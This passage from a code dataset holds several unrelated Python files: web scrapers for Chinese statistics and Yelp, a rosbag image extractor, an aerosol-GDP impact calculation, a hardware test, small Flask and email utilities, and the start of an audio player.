breakdown of train/validation/test\n\tprint(eye.get_dataset_sizes())\n\n\t# train the model for a specified number of epochs\n\tfig0 = eye.train_model(num_epochs=2)\n\t\n\t# evaluate the model and produce relevant figures\n\tfig1, fig2 = eye.evaluate_model()\n\n\t# optionally save the model\n\teye.save_model('demo_model')\n\t\n\t# display all figures\n\tplt.show()\n\n\n\t'''\n\tThe following is an example script that might be run after training\n\tto further evaluate the trained model. In general, scripts should first\n\tload data, then either load or train a model, and finally evaluate the\n\tperformance of the model.\n\n\tthe preprocessed directory should be cleaned before starting a new dataset.\n\tRefer to the Makefile and README.md\n\n\t# after training (and cleaning preprocessed data), consider loading new data\n\teye.load_scraped_data(pos_queries=['Forest Fire'],\n \t\t\t\t\t\t neg_queries=['autumn forest'])\n\t# load the trained model as well\n\teye.load_model('full_dataset_model')\n\t# evaluate the model on the new dataset\n\tfig1, fig2 = eye.evaluate_model(title_prefix='Kaggle Datasets ')\n\tplt.show()\n\t'''\n\n", "sub_path": "fire_eye/__main__.py", "file_name": "__main__.py", "file_ext": "py", "file_size_in_byte": 1711, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "fire_eye.fire_eye.FireEye", "line_number": 9, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}]} +{"seq_id": "245313206", "text": "# -*- coding: utf-8 -*-\n\nimport json\nimport os\nimport datetime\nimport urllib2\nimport time\n\nfrom settings import download_dir, configurelog, testlogger\nfrom lib.nonsdmx import NonSdmx\n\nendpoint = 'http://data.stats.gov.cn/english/easyquery.htm'\nTREE_URL = endpoint + '?id=%(id)s&dbcode=%(dbcode)s&wdcode=%(wdcode)s&m=getTree'\n\nABORT_ON_UNCHANGED = True\nlogger = testlogger()\n\n\ndef is_parent(nodes):\n \"\"\"\n Parse pages for item tha have no child recursively, if find that\n item pass it to scrape data function\n \"\"\"\n for node in nodes:\n if node['isParent']:\n time.sleep(1)\n new_page = urllib2.urlopen(TREE_URL % node).read()\n new_page = json.loads(new_page)\n is_parent(new_page)\n else:\n parse_table(node)\n\n\ndef parse_table(terminal_node):\n tgt_dir = os.path.join(download_dir, 'china_nbs')\n if not os.path.exists(tgt_dir):\n os.makedirs(tgt_dir)\n\n lastupdate = datetime.datetime.today().date()\n item_id = terminal_node['id']\n item_name = terminal_node['name']\n url = endpoint + ('?m=QueryData&dbcode=%(dbcode)s&'\n 'rowcode=%(wdcode)s&colcode=sj&wds=[]&'\n 'dfwds=[{\"wdcode\":\"zb\",\"valuecode\":\"%(id)s\"},'\n '{\"wdcode\":\"sj\",\"valuecode\":\"LAST200\"}]') % terminal_node\n in_in_page = urllib2.urlopen(url).read()\n json_response = json.loads(in_in_page.decode('utf8'))\n data, returncode = json_response['returndata'], json_response['returncode']\n assert(returncode == 200)\n\n nsi = NonSdmx(**{'db_name': 'NBS',\n 'dataset': 'NBS_'+ item_id,\n 'logger': logger,\n 'lastupdate': lastupdate, # need to change\n 'source': 'National Bureau of Statistics, China',\n 'description': terminal_node['name'],\n 'access_url': endpoint,\n 'ABORT_ON_UNCHANGED': ABORT_ON_UNCHANGED})\n\n if not nsi.create_conn():\n return nsi.unchanged()\n\n for v in data['returndata']['wdnodes'][0]['nodes']:\n serial = v['code']\n descrip = v['memo']\n units = v['unit']\n scale = 0\n sadj 
= None\n addinfo = {}\n dates = []\n all_values = []\n\n for val in data['returndata']['datanodes']:\n if serial == val['wds'][0]['valuecode']:\n date = (val['wds'][1]['valuecode'])\n date = datetime.datetime.strptime(date, '%Y%m')\n\n dates.append(date)\n all_values.append(val['data']['data'])\n\n values = {'serial': serial,\n 'freq': freq,\n 'iso2': 'CN',\n 'descrip': descrip,\n 'seasonaladj': sadj,\n 'scale': scale,\n 'units': units,\n 'addinfo': addinfo,\n 'lastupdate': datetime.datetime.today().date(),\n 'values': {'dates': dates[::-1],\n 'data': all_values[::-1]}\n }\n nsi.append_values(values)\n nsi.process_and_close()\n\n\n@configurelog(__file__)\ndef domain(logger):\n \"\"\"\n get dict item as input form request for non parent item, create\n path like in initial tree and save json file there\n \"\"\"\n parse_page = urllib2.urlopen(endpoint +\n '?id=&dbcode=hgyd&wdcode=zb&m=getTree').read()\n start_nodes = json.loads(parse_page)\n is_parent(start_nodes)\n\n\nif __name__ == \"__main__\":\n if 0:\n domain()\n", "sub_path": "ch_stat_example.py", "file_name": "ch_stat_example.py", "file_ext": "py", "file_size_in_byte": 3523, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "settings.testlogger", "line_number": 16, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 26, "usage_type": "call"}, {"api_name": "urllib2.urlopen", "line_number": 27, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 35, "usage_type": "call"}, {"api_name": "settings.download_dir", "line_number": 35, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 37, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 39, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 39, "usage_type": "attribute"}, {"api_name": "urllib2.urlopen", "line_number": 46, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 47, "usage_type": "call"}, {"api_name": "lib.nonsdmx.NonSdmx", "line_number": 51, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 76, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 76, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 89, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 89, "usage_type": "attribute"}, {"api_name": "urllib2.urlopen", "line_number": 103, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 105, "usage_type": "call"}, {"api_name": "settings.configurelog", "line_number": 97, "usage_type": "call"}]} +{"seq_id": "569248445", "text": "####################################################################\n # Name: messages.py\n # Initializes the parts of an email message to be used by other\n # classes.\n####################################################################\n__author__ = 'kkozee'\n\nimport sys\n\nsys.path.append('/Users/kkozee/PycharmProjects/cs362_W15_G9/')\n\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom src.models.base import Base\n\nclass Messages(Base):\n\n def __init__(self):\n self.fullMsg = None\n self.inMsg = None\n self.sendAddr = None\n self.destAddr 
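A runtime error worth flagging in the ch_stat_example.py record above: parse_table() fills its values dict with 'freq': freq, but freq is never assigned anywhere in the file, so the first call raises NameError (the data['returndata'] double index after data = json_response['returndata'] also looks suspect). A hedged repair for the missing name; the guess that six-digit 'sj' codes such as '201801' mean monthly data follows from the record's '%Y%m' parsing, not from any NBS API documentation:

def series_frequency(sj_valuecode):
    # map an NBS time code to a frequency flag: 'M' monthly, 'A' annual (assumption)
    return {6: 'M', 4: 'A'}.get(len(sj_valuecode))

# inside parse_table(), before the values dict is built:
# freq = series_frequency('201801')   # or derive the code from the response itself
print(series_frequency('201801'))  # -> 'M'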
= None\n self.subject = None\n self.body = None\n self.bodyParts = None\n self.subjectParts = None\n self.mimeText = None\n self.calendarRequest = None\n self.msg = MIMEMultipart('alternative')\n self.pt1 = MIMEText(self.mimeText, 'plain')\n self.pt2 = MIMEText(self.calendarRequest, 'calendar')", "sub_path": "cs419_Term Project/src/models/messages.py", "file_name": "messages.py", "file_ext": "py", "file_size_in_byte": 963, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sys.path.append", "line_number": 10, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "src.models.base.Base", "line_number": 16, "usage_type": "name"}, {"api_name": "email.mime.multipart.MIMEMultipart", "line_number": 29, "usage_type": "call"}, {"api_name": "email.mime.text.MIMEText", "line_number": 30, "usage_type": "call"}, {"api_name": "email.mime.text.MIMEText", "line_number": 31, "usage_type": "call"}]} +{"seq_id": "201229773", "text": "#!/usr/bin/python\nimport rosbag\n\nimport sys\nimport argparse\n\nimport os\nimport shutil\n\nimport progressbar\n\nimport numpy as np\nimport cv2\nfrom cv_bridge import CvBridge, CvBridgeError\n\nfrom sensor_msgs.msg import Image\n\n\ndef zip_images(dir_name, output_filename):\n shutil.make_archive(output_filename, 'zip', dir_name)\n\n\ndef decompress_images(bag_filename, destination_folder, num_images_per_zip):\n\n bridge = CvBridge()\n bag = rosbag.Bag(bag_filename)\n\n if os.path.exists(destination_folder):\n shutil.rmtree(destination_folder)\n os.mkdir(destination_folder)\n\n start_time = bag.get_start_time()\n end_time = bag.get_end_time()\n run_time = end_time - start_time\n\n print(\"Bag is %.2f seconds\" % run_time)\n\n type_topic_info = bag.get_type_and_topic_info()\n topics = type_topic_info.topics\n print(\"Bag contains topics: \")\n\n for topic in topics.keys():\n print(\"\\t%s %s %d\" % (topic, topics[topic][0], topics[topic][1]))\n\n toolbar_width = 70\n bar = progressbar.ProgressBar(maxval=toolbar_width,\n widgets=[progressbar.Bar('#', '[', ']'), ' ',\n progressbar.Percentage()])\n bar.start()\n\n num_images = 0\n subdir_names = []\n subdir_num = -1\n for topic, msg, t in bag.read_messages():\n bar.update((t.to_sec() - start_time) / run_time * toolbar_width)\n\n if msg._type == Image._type:\n\n if num_images % num_images_per_zip == 0:\n # if -1, only do this the first time\n if (num_images_per_zip != -1) or (len(subdir_names) == 0):\n subdir_num += 1\n subdir_names.append(\n bag_filename.split(\".\")[0] + \"_%s\" % subdir_num)\n os.mkdir(destination_folder + \"/\" + subdir_names[subdir_num])\n try:\n\n img = bridge.imgmsg_to_cv2(msg, desired_encoding=\"bgr8\")\n image_name = \"%s_%s.jpg\" % (topic.split(\"/\")[-1], str(t))\n destination_name = destination_folder\n destination_name += \"/%s/%s\" % (subdir_names[subdir_num],\n image_name)\n\n cv2.imwrite(destination_name, img)\n num_images += 1\n\n except CvBridgeError as e:\n print(e)\n\n bag.close()\n\n print(\"\") # move down a line from the progress bar\n print(\"Extracted %s images. 
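The Messages initializer above builds MIMEText(self.mimeText, 'plain') and MIMEText(self.calendarRequest, 'calendar') while both payloads are still None, which fails as soon as the email package tries to encode the body. The usual pattern is to attach parts only once concrete content exists; a self-contained sketch using only standard-library calls (the function name and arguments are illustrative):

from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

def build_message(subject, sender, recipient, text_body, calendar_body=None):
    # assemble a multipart/alternative message from concrete payloads
    msg = MIMEMultipart('alternative')
    msg['Subject'] = subject
    msg['From'] = sender
    msg['To'] = recipient
    msg.attach(MIMEText(text_body, 'plain'))
    if calendar_body is not None:
        msg.attach(MIMEText(calendar_body, 'calendar'))
    return msg

print(build_message('yes', 'a@example.com', 'b@example.com', 'really'))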
Creating zips ...\" % num_images)\n for subdir_name in subdir_names:\n zip_images(destination_folder + \"/\" + subdir_name,\n \"zipped_images/%s_unlabeled\" % subdir_name)\n print(\"Done!\")\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--bag', default=None)\n parser.add_argument('--max_imgs', default=1000) # use -1 for all in one\n parser.add_argument('--output_folder', default=\"images\")\n\n args = parser.parse_args(sys.argv[1:])\n\n if args.bag is None:\n print(\"Bag file is required!\")\n return\n\n decompress_images(args.bag, args.output_folder, int(args.max_imgs))\n\n\nif __name__ == \"__main__\":\n main()\n", "sub_path": "data_gen/bag_to_images.py", "file_name": "bag_to_images.py", "file_ext": "py", "file_size_in_byte": 3136, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "shutil.make_archive", "line_number": 20, "usage_type": "call"}, {"api_name": "cv_bridge.CvBridge", "line_number": 25, "usage_type": "call"}, {"api_name": "rosbag.Bag", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 29, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 30, "usage_type": "call"}, {"api_name": "progressbar.ProgressBar", "line_number": 46, "usage_type": "call"}, {"api_name": "progressbar.Bar", "line_number": 47, "usage_type": "call"}, {"api_name": "progressbar.Percentage", "line_number": 48, "usage_type": "call"}, {"api_name": "sensor_msgs.msg.Image._type", "line_number": 57, "usage_type": "attribute"}, {"api_name": "sensor_msgs.msg.Image", "line_number": 57, "usage_type": "name"}, {"api_name": "os.mkdir", "line_number": 65, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 74, "usage_type": "call"}, {"api_name": "cv_bridge.CvBridgeError", "line_number": 77, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 91, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 96, "usage_type": "attribute"}]} +{"seq_id": "477228412", "text": "from bs4 import BeautifulSoup\nimport sys\nimport requests\n\n\n# getting command line arguments\nargs = sys.argv\n\n# assigning command line arguments to variables for search\ntry:\n business_type = args[1]\n location = args[2]\n sql_file = (business_type + \"_\" + location + \".sql\").replace(\"+\", \"_\")\n\n # creating url with command line arguments\n url = \"https://www.yelp.com/search?find_desc=\" + business_type + \"&find_loc=\" + location\n\n source = requests.get(url).text\n soup = BeautifulSoup(source, 'lxml')\n i = 1\n\n with open(sql_file, 'w') as file:\n table_name = business_type + '_' + location\n file.write('DROP DATABASE IF EXISTS yelp\\n')\n file.write('CREATE DATABASE yelp\\n')\n file.write('CREATE TABLE ' + table_name.replace(\"+\", \"_\") + '(id integer, business_name text, category text, location text, primary key (id));\\n')\n for li in soup.find('ul'):\n try:\n result_num = i\n result_name = li.h4.a.text\n result_category = li.find('a', 'lemon--a__09f24__IEZFH link__09f24__1kwXV link-color--inherit__09f24__3PYlA link-size--default__09f24__3xWLF').text\n file.write(\"INSERT INTO \" + table_name.replace(\"+\", \"_\") + \" VALUES ('\" + str(result_num) + \"','\" + result_name + \"','\" + result_category + \"','\" + location.replace(\"+\", \", \") + \"');\\n\")\n i += 1\n except:\n pass\nexcept:\n 
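The extraction loop in the bag_to_images.py record above rotates to a fresh sub-directory every num_images_per_zip images (-1 meaning one batch for everything) and zips each directory afterwards. The same batching idea reduced to plain files, with no ROS dependency; all names here are illustrative:

import os
import shutil

def batch_and_zip(paths, batch_size, out_root='batches'):
    # copy files into fixed-size batch directories, then zip each batch
    batch_dirs = []
    for i, path in enumerate(paths):
        if i % batch_size == 0:
            batch_dirs.append(os.path.join(out_root, 'batch_%d' % (i // batch_size)))
            os.makedirs(batch_dirs[-1], exist_ok=True)
        shutil.copy(path, batch_dirs[-1])
    return [shutil.make_archive(d, 'zip', d) for d in batch_dirs]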
print('not the right number of args, please enter 2 command line args: a search and a location')\n\n\n\n", "sub_path": "yelp_scraping.py", "file_name": "yelp_scraping.py", "file_ext": "py", "file_size_in_byte": 1536, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "sys.argv", "line_number": 7, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 18, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "103634723", "text": "from delta.model import *\nfrom delta.util import create_cgra\nimport pytest\nimport lassen.asm as asm\nfrom archipelago import pnr\nfrom karst.core import MemoryInstruction, MemoryMode\n\n\n@pytest.fixture\ndef interconnect_route():\n chip_size = 2\n\n interconnect = create_cgra(chip_size, True, cores_input=None)\n\n netlist = {\"e0\": [(\"I0\", \"io2f_16\"), (\"p0\", \"data0\")],\n \"e1\": [(\"I1\", \"io2f_16\"), (\"p0\", \"data1\")],\n \"e2\": [(\"p0\", \"out\"), (\"m0\", \"addr\")],\n \"e3\": [(\"m0\", \"data_out\"), (\"I2\", \"f2io_16\")],\n \"e4\": [(\"i0\", \"io2f_1\"), (\"m0\", \"ren\")]}\n bus = {\"e0\": 16, \"e1\": 16, \"e2\": 16, \"e3\": 16, \"e4\": 1}\n\n placement, route = pnr(interconnect, (netlist, bus), cwd=\"temp\")\n\n return interconnect, placement, route\n\n\ndef test_add(interconnect_route):\n interconnect, placement, route_path = interconnect_route\n instruction = asm.add()\n\n compiler = InterconnectModelCompiler(interconnect)\n compiler.configure_route(route_path)\n x, y = placement[\"p0\"]\n compiler.set_core_instr(x, y, instruction)\n # configure the memory\n data_entries = [(i, i + 42) for i in range(100)]\n mem_instr = MemoryInstruction(MemoryMode.SRAM,\n data_entries=data_entries)\n x, y = placement[\"m0\"]\n compiler.set_core_instr(x, y, mem_instr)\n\n model = compiler.compile()\n\n # poke values\n path = route_path[\"e0\"][0]\n input_1 = path[0]\n path = route_path[\"e1\"][0]\n input_2 = path[0]\n path = route_path[\"e4\"][0]\n input_3 = path[0]\n path = route_path[\"e3\"][0]\n end = path[-1]\n\n # set ren to high all the time\n model.set_value(input_3, 1)\n\n for idx, value in enumerate(range(10)):\n model.set_value(input_1, value)\n model.set_value(input_2, value)\n model.eval()\n if idx > 0:\n assert model.get_value(end) == value + value + 42 - 2\n", "sub_path": "tests/test_transcendental.py", "file_name": "test_transcendental.py", "file_ext": "py", "file_size_in_byte": 1894, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "delta.util.create_cgra", "line_number": 13, "usage_type": "call"}, {"api_name": "archipelago.pnr", "line_number": 22, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 9, "usage_type": "attribute"}, {"api_name": "lassen.asm.add", "line_number": 29, "usage_type": "call"}, {"api_name": "lassen.asm", "line_number": 29, "usage_type": "name"}, {"api_name": "karst.core.MemoryInstruction", "line_number": 37, "usage_type": "call"}, {"api_name": "karst.core.MemoryMode.SRAM", "line_number": 37, "usage_type": "attribute"}, {"api_name": "karst.core.MemoryMode", "line_number": 37, "usage_type": "name"}]} +{"seq_id": "118999857", "text": "# -*- coding: utf-8 -*-\n\n'''\nThis code calculates impacts of temperature changes induced by aerosols on GDP\n\npositive results mean benefits from aerosol-induced cooling\n\ndamage function developed in Burke, Matthew Davis, and Diffenbaugh (2018) 
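The yelp_scraping.py record above splices scraped strings directly into INSERT statements, so any business name containing an apostrophe yields broken SQL, and untrusted page content can inject arbitrary statements into the generated file. When rows are executed rather than written to a .sql file, parameter binding sidesteps both problems; a sketch using sqlite3 purely for illustration:

import sqlite3

def insert_rows(db_path, table, rows):
    # rows: iterable of (id, business_name, category, location) tuples;
    # only the table name is interpolated, so it must come from trusted code
    conn = sqlite3.connect(db_path)
    with conn:  # commits on success, rolls back on error
        conn.execute('CREATE TABLE IF NOT EXISTS %s (id INTEGER PRIMARY KEY,'
                     ' business_name TEXT, category TEXT, location TEXT)' % table)
        conn.executemany('INSERT INTO %s VALUES (?, ?, ?, ?)' % table, rows)
    conn.close()

insert_rows(':memory:', 'restaurants', [(1, "Joe's Diner", 'Diners', 'Austin, TX')])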
\n\nassume results of each year are independent for the CESM repeating cycle simulations\n\ncalculate for each grid\n\nclimatological temperature obtained from the ERA-Interim reanalysis dataset\n\nby Yixuan Zheng (yxzheng@carnegiescience.edu)\n''' \n \n\nimport pandas as pd\nimport numpy as np\nimport _env\nimport datetime\nimport xarray as xr\n\nnens = _env.nens\n\nyear = _env.year\nsyr = str(year)\ngdp_year = year\nsgdp_year = str(gdp_year)\n\npar = 'TREFHT' \nds = 'ERA-Interim'\n\nrean_ttag = '2001-2018'\n\nif_base = _env.idir_root+ '/reanalysis/ERA-Interim_Surface_Temp_' + rean_ttag + '_Regridded.nc'\nif_sim = _env.odir_root + '/sim_temperature/Simulated_Global_Gridded_' + par + '.nc'\n\nif_boot_par = _env.idir_root + 'Burke2018_Replication/data/output/bootstrap.csv'\nif_pop = _env.idir_root + '/pop/GPW_POP_25x19deg_2000.nc'\n\n\nodir_gdp = _env.odir_root + '/gdp_' + ds + '/'\n_env.mkdirs(odir_gdp)\n\nscenarios = ['With-Aerosol','No-Aerosol'] \n#read gridded temperature\n\n##base temperature from reanalysis data (ERA-Interim)\ni_base = xr.open_dataset(if_base)\ni_base = i_base.expand_dims({'ensembles':8})\n\ni_base.transpose('ensembles', 'lat', 'lon')\nT_grid_base = i_base['t2m_mean'] - 273.15 #K to C\n\n\ni_sim = xr.open_dataset(if_sim)\n\nT_grid_wa = i_sim[par + '_' +scenarios[0] + '_ensemble'] #With-Aerosol\nT_grid_na = i_sim[par + '_' +scenarios[1] + '_ensemble'] #No-Aerosol\n\nT_grid_na = T_grid_base - T_grid_wa + T_grid_na\nT_grid_wa = T_grid_base.copy()\n\n#bootstrap methods\nitbl_boots_par = pd.read_csv(if_boot_par,index_col=0)\nboot_methods = (pd.unique(itbl_boots_par['spec'])).tolist() #['country-lag0','country-lag1','country-lag5','year','year-blocks']\n\n#columns of output gdp ratio tables\n\n#dict stores all output tables\notbls_boot = {}\nomtrxs_ratio = {}\nomtrxs_gdp = {}\n\nfor b_m in boot_methods: #loop of bootstrapping methods \n    \n    mtbl_boot_par_b1 = xr.DataArray(itbl_boots_par.loc[itbl_boots_par['spec'] == b_m,'b1'],\n                           dims=('boots')\n                           )\n    \n    mtbl_boot_par_b2 = xr.DataArray(itbl_boots_par.loc[itbl_boots_par['spec'] == b_m,'b2'],\n                           dims=('boots')\n                           )\n    \n    o_dgr = xr.DataArray(np.zeros([len(mtbl_boot_par_b1),i_sim.ensembles.size,i_sim.lat.size,i_sim.lon.size]),\n                 dims=('boots', 'ensembles','lat','lon'),\n                 coords={'lat': i_sim.lat,\n                         'lon': i_sim.lon})\n    \n    o_dgr = (T_grid_na*mtbl_boot_par_b1 + T_grid_na**2*mtbl_boot_par_b2) - (T_grid_wa*mtbl_boot_par_b1 + T_grid_wa**2*mtbl_boot_par_b2)\n    \n    o_dgr_m = o_dgr.median(dim=['boots','ensembles'])\n    \n    o_dgr.attrs['desc'] = 'Median of impacts of aerosol-induced cooling on annual GDP growth rate'\n    \n    ods = xr.Dataset({'GDP_Ratio_Median': o_dgr_m})\n    \n    ods.attrs['by'] = 'Yixuan Zheng (yxzheng@carnegiescience.edu)'\n    ods.attrs['desc'] = 'Impacts of aerosol-induced cooling on GDP growth rate (based on damage functions developed by Burke et al. 
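The loop above is the entire damage calculation: for each bootstrap draw (b1, b2) it evaluates the quadratic growth response g(T) = b1*T + b2*T**2 at the no-aerosol and with-aerosol temperature fields and takes the difference. The arithmetic in isolation, with made-up inputs (the real coefficients come from the bootstrap.csv draws, not from here):

import numpy as np

def growth_rate_delta(t_no_aerosol, t_with_aerosol, b1, b2):
    # g(T) = b1*T + b2*T**2, evaluated at both temperatures and differenced
    g = lambda t: b1 * t + b2 * t ** 2
    return g(t_no_aerosol) - g(t_with_aerosol)

# illustrative values only: 0.5 C of aerosol cooling around a 13.5 C climatology
print(growth_rate_delta(np.array([14.0]), np.array([13.5]), b1=0.0127, b2=-0.0005))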
2018)'\n ods.attrs['creattime'] = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n \n ods.to_netcdf(odir_gdp + 'GDP_Changes_Burke_' + b_m + '_' + sgdp_year +'_' + ds + '_' + scenarios[1] + '_gridded.nc')\n", "sub_path": "modules/5.Cal_gdp_benefit_grid_Burke.py", "file_name": "5.Cal_gdp_benefit_grid_Burke.py", "file_ext": "py", "file_size_in_byte": 3487, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "_env.nens", "line_number": 26, "usage_type": "attribute"}, {"api_name": "_env.year", "line_number": 28, "usage_type": "attribute"}, {"api_name": "_env.idir_root", "line_number": 38, "usage_type": "attribute"}, {"api_name": "_env.odir_root", "line_number": 39, "usage_type": "attribute"}, {"api_name": "_env.idir_root", "line_number": 41, "usage_type": "attribute"}, {"api_name": "_env.idir_root", "line_number": 42, "usage_type": "attribute"}, {"api_name": "_env.odir_root", "line_number": 45, "usage_type": "attribute"}, {"api_name": "_env.mkdirs", "line_number": 46, "usage_type": "call"}, {"api_name": "xarray.open_dataset", "line_number": 52, "usage_type": "call"}, {"api_name": "xarray.open_dataset", "line_number": 59, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 68, "usage_type": "call"}, {"api_name": "pandas.unique", "line_number": 69, "usage_type": "call"}, {"api_name": "xarray.DataArray", "line_number": 80, "usage_type": "call"}, {"api_name": "xarray.DataArray", "line_number": 84, "usage_type": "call"}, {"api_name": "xarray.DataArray", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 88, "usage_type": "call"}, {"api_name": "xarray.Dataset", "line_number": 99, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 103, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 103, "usage_type": "attribute"}]} +{"seq_id": "349404497", "text": "from flask import Flask, render_template\nimport random\nimport pickle\nimport io\n\nbaldwin = io.open('letter-from-a-region-baldwin.txt', encoding='utf-8').read()\nspencer_bios = pickle.load(open('bios.pickle', 'rb'))\n\napp = Flask(__name__)\n\n@app.route('/white')\ndef white():\n white_lines = []\n lines = baldwin.split('.')\n for line in lines:\n if line.lower().find('white'.lower()) != -1:\n white_lines.append(line)\n\n white_bios = []\n for bio in spencer_bios:\n if bio == '':\n spencer_bios.remove(bio)\n if bio == ' ':\n spencer_bios.remove(bio)\n words = bio.split()\n for word in words:\n if word.lower().find('white'.lower()) != -1:\n white_bios.append(bio)\n\n picker1 = random.randrange(0, len(white_bios), 1)\n picker2 = random.randrange(0, len(white_lines), 1)\n return render_template(\"whiteness.html\", rs_follower=white_bios[picker1], baldwin=white_lines[picker2])\n\nif __name__ == '__main__':\n app.run()\n", "sub_path": "server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 947, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "io.open", "line_number": 6, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 7, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 9, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 30, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 31, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "57121283", "text": 
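Two pitfalls in the server.py record that just ended: it calls spencer_bios.remove(...) while iterating over spencer_bios, and mutating a list mid-iteration silently skips elements; and random.randrange(0, len(...), 1) raises ValueError whenever nothing matched the search term. A compact filter avoiding both (the function name is illustrative):

import random

def pick_matching(lines, needle):
    # return one random non-blank line containing `needle`, or None if none match
    matches = [s for s in lines if s.strip() and needle.lower() in s.lower()]
    return random.choice(matches) if matches else None

print(pick_matching(['a white horse', '   ', 'night'], 'white'))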
"# Copyright Max Kolosov 2009-2013 pyirrlicht@gmail.com\n# http://pybass.sf.net\n# BSD license\n\n\nimport pybass\nimport sys\n\n\ntry:\n import pybassmidi\nexcept Exception:\n pybassmidi = None\n\n\ntry:\n from exe import wx\nexcept Exception:\n import wx\n\n\nfrom wx.lib.ticker import Ticker\n\n\ndef print_error():\n exc, err, traceback = sys.exc_info()\n print('%s %s ERROR ON LINE %d %s\\n' % (exc, traceback.tb_frame.f_code.co_filename, traceback.tb_lineno, err))\n del exc, err, traceback\n\n\nclass memory_stream:\n\n def __init__(self, data, name='memory_stream'):\n self.name = name\n self.current_position = 0\n self.data = data\n self.end_position = len(self.data) - 1\n self.decode_length = 0\n self.seconds = 0\n\n def read(self, size=1024):\n result = ''\n if self.current_position is not self.end_position and size > 0:\n last_index = self.current_position + size\n if last_index > self.end_position:\n last_index = self.end_position\n result = self.data[self.current_position: last_index]\n self.current_position = last_index\n return result\n\n def write(self, value=''):\n self.data += value\n\n def seek(self, position, whence=0):\n if whence is 0:\n if position <= self.end_position:\n self.current_position = position\n elif whence is 1:\n if position + self.current_position <= self.end_position:\n self.current_position += position\n elif whence is 2:\n if position < 0:\n position *= -1\n if self.end_position - position > 0:\n self.current_position = self.end_position - position\n\n def tell(self):\n return self.current_position\n\n def isatty(self):\n return 1\n\n def flush(self):\n pass\n\n def is_eof(self):\n return self.current_position == self.end_position\n\n\nclass slider_ctrl(wx.Slider):\n\n def __init__(self, *args, **kwargs):\n self.timer_interval = 500\n self.player_ctrl = args[0]\n wx.Slider.__init__(self, *args, **kwargs)\n self.timer = wx.Timer(self)\n self.Bind(wx.EVT_LEFT_DOWN, self.event_left_down)\n self.Bind(wx.EVT_LEFT_UP, self.event_left_up)\n self.Bind(wx.EVT_TIMER, self.event_timer)\n\n def __del__(self):\n if hasattr(self, 'timer'):\n self.timer.Stop()\n\n def timer_start(self):\n if not self.timer.IsRunning():\n self.timer.Start(self.timer_interval)\n\n def timer_stop(self):\n if self.timer.IsRunning():\n self.timer.Stop()\n\n def event_timer(self, event):\n if self.player_ctrl.method_get_position() < self.player_ctrl.method_get_length() - 1:\n self.SetValue(self.player_ctrl.method_get_position())\n else:\n self.player_ctrl.method_stop_audio()\n\n def event_left_down(self, event):\n self.timer_stop()\n event.Skip()\n\n def event_left_up(self, event):\n self.player_ctrl.method_set_position(self.GetValue())\n self.timer_start()\n event.Skip()\n\n\nclass player_ctrl(wx.Panel):\n\n def __init__(self, *args, **kwargs):\n\n self.stream = kwargs.pop('stream', None)\n self.name_stream = kwargs.pop('name_stream', 'memory_stream')\n self.bass_handle = 0\n self.sound_font = 0\n\n result = pybass.BASS_Init(-1, 44100, 0, 0, 0)\n if not result:\n bass_error_code = pybass.BASS_ErrorGetCode()\n if bass_error_code != 